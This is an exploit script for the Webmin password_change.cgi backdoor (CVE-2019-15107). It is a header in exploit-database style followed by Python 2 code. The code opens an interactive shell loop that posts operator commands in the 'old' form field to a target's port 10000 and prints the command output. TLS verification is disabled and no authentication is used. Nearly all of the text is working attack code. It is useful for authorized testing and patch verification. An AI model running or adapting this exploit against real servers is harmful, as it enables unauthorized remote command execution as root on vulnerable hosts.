CVE-2019-15107

1. # Exploit Title: Webmin backdoor CVE-2019-15107 (RCE)
2. # Exploit author : chako
3. # Date: 2019-12-29
4. # Software Link: http://www.webmin.com/download.html (Webmin <= 1.920)
5. # Vuln Reported by: AkkuS
6. # Original Post: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
7. #                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
8. #
9. # "Webmin installation must have Webmin -> Webmin Configuration -> Authentication ->
10. # Password expiry policy set to Prompt users with expired passwords to enter a new one.
11. # This option is not set by default, but if it is set, it allows remote code execution."
12. # ---- ( https://www.virtualmin.com/node/66890 )
13.  
14. #!/usr/bin/python
15. import requests
16. import sys
17. import re
18.  
19. #target = "https://192.168.1.84:10000/password_change.cgi"
20.  
21. if len(sys.argv)>=2:
22.     target = "https://"+sys.argv[1]+":10000/password_change.cgi"
23.     cmd = raw_input("Command># ")
24. else:
25.     print "\nUsage: python .\webmin.py [Target IP]\n"
26.     exit()
27.  
28. while cmd != "exit" :
29.     client = requests.session()
30.     requests.packages.urllib3.disable_warnings()
31.     payload = {'user':'root','pam':'','expired':'2','expired':'2','old':cmd,'new1':'opgg','new2':'opgg'}
32.     response = client.post(target, verify=False, data=payload,headers=dict(Referer=target))
33.    
34.     if response.ok:    
35.         x = re.search("(is incorrect)(.*)<\/h3><\/center>", response.text.encode("utf-8"), flags=re.DOTALL)
36.         if (x):
37.             print x.group().replace("</h3></center>","").replace("is incorrect","")
38.         else:
39.             print("No match")
40.     else:
41.         print "error code --> ",response.status_code
42.        
43.     cmd = raw_input("Command># ")
44.     print cmd